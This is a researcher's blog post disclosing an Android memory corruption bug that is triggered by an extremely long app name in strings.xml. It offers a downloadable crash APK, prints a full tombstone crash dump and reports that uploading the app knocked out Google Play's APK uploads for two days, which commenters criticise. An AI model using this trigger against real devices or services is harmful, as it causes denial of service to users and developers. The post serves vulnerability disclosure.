Android OS Memory Corruption Bug

 

Update: 
THIS VULN CAUSED DoS on GOOGLE PLAY. Nobody can upload APK for 2 days!! more info:

http://ibrahimbalic.com/2014/android-vulnerability-affected-google-play-bouncer-emulator/

 

Hi guys,

This week I tried hard on Android (tools and os) by fuzzing and I found a Android OS memory corruption bugs and Android Debug Bridge (adb.exe) BOF.

This android os bug causes memory corruption and shuts the android os.

I tested on Android 4.2.2, Android 4.3, Android 2.3 versions the result seems to be the same every attempt.

The cause of the bugs is the “appname” length. if you set the appname in strings.xml and set as big long value (387000+ chars) which triggers the bug.

If you want to test, Install this app and run your android device.

download apk

 

I/DEBUG (12909): pid: 13049, tid: 13079, name: WindowManager >>> system_server <<<
I/DEBUG (12909): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 5fbfe000
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): r4 601fdbf0 r5 5fb771d8 r6 5c6a5af8 r7 5c19ea88
I/DEBUG (12909): r8 00000000 r9 001a1a80 sl 00000000 fp 42375618
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909): d0 4100000041000000 d1 4100000041000000
I/DEBUG (12909): d2 4100000041000000 d3 4100000041000000
I/DEBUG (12909): d4 4100000041000000 d5 4100000041000000
I/DEBUG (12909): d6 4100000041000000 d7 4100000041000000
I/DEBUG (12909): d8 c3a00000c3a00000 d9 3f80000044340000
I/DEBUG (12909): d10 430500003f800000 d11 3fcdd94742960000
I/DEBUG (12909): d12 4000000000000000 d13 3f0000003f3bb28f
I/DEBUG (12909): d14 000000003f3bb28f d15 0000000000000000
I/DEBUG (12909): d16 0000903cb0e16900 d17 7fffffffffffffff
I/DEBUG (12909): d18 0000000000000000 d19 0000000000000000
I/DEBUG (12909): d20 0000000000000000 d21 397377ce858a5d48
I/DEBUG (12909): d22 3fa555555555554c d23 bcb1a62633145c07
I/DEBUG (12909): d24 3fc55546b2662d7e d25 3fefd70a40000000
I/DEBUG (12909): d26 3fd5555c80ffa191 d27 3fdb6dbfa3a1ea05
I/DEBUG (12909): d28 3fe33338d877fab4 d29 bf747ae000000000
I/DEBUG (12909): d30 3fffeb8500000000 d31 0000000000000000
I/DEBUG (12909): scr 60000010
I/DEBUG (12909):
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909):
I/DEBUG (12909): stack:
I/DEBUG (12909): 5fb77150 5c6a5b14
I/DEBUG (12909): 5fb77154 5c6a5b18
I/DEBUG (12909): 5fb77158 5fb771a4
I/DEBUG (12909): 5fb7715c 401d1885 /system/lib/libandroid_runtime.so (android::TextLayoutEngine::getValue(SkPaint const*, unsigned short const*, int, int, int, int)+104)
I/DEBUG (12909): 5fb77160 00000000
I/DEBUG (12909): 5fb77164 001a1a80
I/DEBUG (12909): 5fb77168 001a1a80
I/DEBUG (12909): 5fb7716c 00000000
I/DEBUG (12909): 5fb77170 601fdbf0
I/DEBUG (12909): 5fb77174 5fb771d8
I/DEBUG (12909): 5fb77178 42375618 /dev/ashmem/dalvik-heap (deleted)
I/DEBUG (12909): 5fb7717c 5c19ea88
I/DEBUG (12909): 5fb77180 00000000
I/DEBUG (12909): 5fb77184 001a1a80
I/DEBUG (12909): 5fb77188 df0027ad
I/DEBUG (12909): 5fb7718c 00000000
I/DEBUG (12909): #00 5fb77190 00000000
I/DEBUG (12909): 5fb77194 001a1a80
I/DEBUG (12909): #01 5fb77198 001a1a80
I/DEBUG (12909): 5fb7719c 00000000
I/DEBUG (12909): 5fb771a0 00000000
I/DEBUG (12909): 5fb771a4 5c6a5af8
I/DEBUG (12909): 5fb771a8 00000000
I/DEBUG (12909): 5fb771ac 5d28ec10
I/DEBUG (12909): 5fb771b0 001a1a80
I/DEBUG (12909): 5fb771b4 00000000
I/DEBUG (12909): 5fb771b8 601fdbe0
I/DEBUG (12909): 5fb771bc 00000000
I/DEBUG (12909): 5fb771c0 001a1a80
I/DEBUG (12909): 5fb771c4 401cd64d /system/lib/libandroid_runtime.so
I/DEBUG (12909): 5fb771c8 001a1a80
I/DEBUG (12909): 5fb771cc 00000000
I/DEBUG (12909): 5fb771d0 5fb771d8
I/DEBUG (12909): 5fb771d4 601fdbf0
I/DEBUG (12909):
I/DEBUG (12909): memory near r0:
I/DEBUG (12909): 5fbfdfb8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfc8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfd8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdfe8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fbfdff8 41000000 41000000 00000000 00000000 …A…A……..
I/DEBUG (12909):
I/DEBUG (12909): memory near r1:
I/DEBUG (12909): 6584ae38 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae48 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae58 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae68 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 6584ae78 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near r2:
I/DEBUG (12909): 005ffb60 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb70 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb80 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffb90 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 005ffba0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near r3:
I/DEBUG (12909): 3acb31a0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31b0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31c0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31d0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 3acb31e0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near r4:
I/DEBUG (12909): 601fdbd0 00000000 407d61a8 42375608 bb700005 …..a}@.V7B..p.
I/DEBUG (12909): 601fdbe0 407d64fc 5fb771d8 4013aa4c 5c19ea88 .d}@.q._L..@…\
I/DEBUG (12909): 601fdbf0 00000000 9477d17e bb700005 5d28ec10 ….~.w…p…(]
I/DEBUG (12909): 601fdc00 42375618 bb700005 5c19ea88 00000000 .V7B..p….\….
I/DEBUG (12909): 601fdc10 00000000 001a1a80 00000000 401cd7cf ……………@
I/DEBUG (12909):
I/DEBUG (12909): memory near r5:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d …`……..M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 ………q._…`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near r6:
I/DEBUG (12909): 5c6a5ad8 00000000 00000000 00000000 00000000 …………….
I/DEBUG (12909): 5c6a5ae8 00000000 00000000 00000000 00000043 …………C…
I/DEBUG (12909): 5c6a5af8 40200e80 5c89c6c0 40200ea0 657c4018 .. @…\.. @.@|e
I/DEBUG (12909): 5c6a5b08 001a1a80 00000007 00000004 4b50d400 …………..PK
I/DEBUG (12909): 5c6a5b18 40200ee8 65e4b018 001a1a80 00000007 .. @…e……..
I/DEBUG (12909):
I/DEBUG (12909): memory near r7:
I/DEBUG (12909): 5c19ea68 00000000 00000040 00000010 00000010 ….@………..
I/DEBUG (12909): 5c19ea78 00040006 001e0103 00000038 00000053 ……..8…S…
I/DEBUG (12909): 5c19ea88 40b36f80 41600000 3f800000 00000000 .o.@..`A…?….
I/DEBUG (12909): 5c19ea98 00000000 00000000 00000000 00000000 …………….
I/DEBUG (12909): 5c19eaa8 00000000 00000000 5c542620 00000000 …….. &T\….
I/DEBUG (12909):
I/DEBUG (12909): memory near r9:
I/DEBUG (12909): 001a1a60 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a70 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a80 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1a90 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909): 001a1aa0 ffffffff ffffffff ffffffff ffffffff …………….
I/DEBUG (12909):
I/DEBUG (12909): memory near fp:
I/DEBUG (12909): 423755f8 40c9fc88 00000000 40cbf9f8 0034351b …@…….@.54.
I/DEBUG (12909): 42375608 40c39928 00000000 001a1a80 00000000 (..@…………
I/DEBUG (12909): 42375618 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375628 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375638 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909):
I/DEBUG (12909): memory near ip:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d …`……..M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 ………q._…`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 …A…A…A…A
I/DEBUG (12909):
I/DEBUG (12909): memory near sp:
I/DEBUG (12909): 5fb77170 601fdbf0 5fb771d8 42375618 5c19ea88 …`.q._.V7B…\
I/DEBUG (12909): 5fb77180 00000000 001a1a80 df0027ad 00000000 ………’……
I/DEBUG (12909): 5fb77190 00000000 001a1a80 001a1a80 00000000 …………….
I/DEBUG (12909): 5fb771a0 00000000 5c6a5af8 00000000 5d28ec10 …..Zj\……(]
I/DEBUG (12909): 5fb771b0 001a1a80 00000000 601fdbe0 00000000 ………..`….
I/DEBUG (12909):
I/DEBUG (12909): code around pc:
I/DEBUG (12909): 400f81f0 f5d1f020 ba000007 f5d1f040 f5d1f060 …….@…`…
I/DEBUG (12909): 400f8200 ecb10b10 f5d1f040 f5d1f060 e2522040 ….@…`…@ R.
I/DEBUG (12909): 400f8210 eca00b10 aafffff9 e2922040 0a00000f ……..@ ……
I/DEBUG (12909): 400f8220 e3520008 ba000004 ecb10b02 e2422008 ..R………. B.
I/DEBUG (12909): 400f8230 e3520008 eca00b02 aafffffa e3120004 ..R………….
I/DEBUG (12909):
I/DEBUG (12909): code around lr:
I/DEBUG (12909): 401d05f0 46339303 980e4601 a8059002 f90ef001 ..3F.F……….
I/DEBUG (12909): 401d0600 b14e9e05 6932b12d 68f14628 f7c60092 ..N.-.2i(F.h….
I/DEBUG (12909): 401d0610 b10cea36 602169f1 f7d8a805 b007fb89 6….i!`……..
I/DEBUG (12909): 401d0620 83f0e8bd b087b5f0 460d4616 4604461f ………F.F.F.F
I/DEBUG (12909): 401d0630 ff2af7e8 46222300 0048e88d 9602462b ..*..#”F..H.+F..
I/DEBUG (12909):
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000

20 comments

  1. noone important says:

    So you brought down google play console? That’s is not funny

  2. ibrahimbalic says:

    I know that is not funny. but I just do only for research… and I’m sorry ;)

  3. […] This week I tried hard on Android (tools and os) by fuzzing and I found a Android OS memory corruption bugs and Android Debug Bridge (adb.exe) BOF.  […]

  4. Christian says:

    Okay you found the bug. But why the hell did you do this upload again?
    Thats crazy and really not funny as many developers are unable to update their Apps now.
    If you’re that good, start help Google investigating on the problem.

    Word up!

  5. ibrahimbalic says:

    Yeah, you maybe right. but things has occurred spontaneously. May intention was never to harm anything or anyone, conversely I’m trying my best to help ;)

  6. ibrahimbalic says:

    WoW.. its rock.in ; )

  7. abdalrhman says:

    GooooooooooooooD ibrahim balic
    You actually deserve all the appreciation :)

  8. mirko says:

    RespecT!!! :)

  9. Tech News says:

    Malicious apps can hose Android phones, erase data, researchers warn

    Photograph by Listener42 (remixed) Security researchers said they have uncovered bugs in Google's

  10. ibrahimbalic says:

    thanks ( :

  11. ibrahimbalic says:

    thanks

  12. ibrahimbalic says:

    thanks

  13. […] recently read about an Android system crash vulnerability affecting Google’s Bouncer™ infrastructure, one that, […]

  14. […] 4.3, and possibly many other releases of the operating system, researcher Ibrahim Balic wrote in a blog post published last week. Attackers could exploit the underlying memory corruption bug by hiding attack code in an otherwise […]

  15. […] seu site Balic disponibilizou o vírus para downloads e os […]

  16. TOM_Harrison says:

    i have test the apk.
    actually that just cause the installer reading slow or crash.
    although i have see something in dmesg

  17. […] peu vite. Lorsque Trend Micro a décidé de regarder de plus près les recherches du développeur Ibrahim Baliç, relatives à une corruption de la mémoire sur Android, il a adopté le réflexe de […]

  18. […] he said. Then he created an Android app to exploit the vulnerability, ‘causes a possible memory corruption‘ and uploaded it to the Google’s Developer […]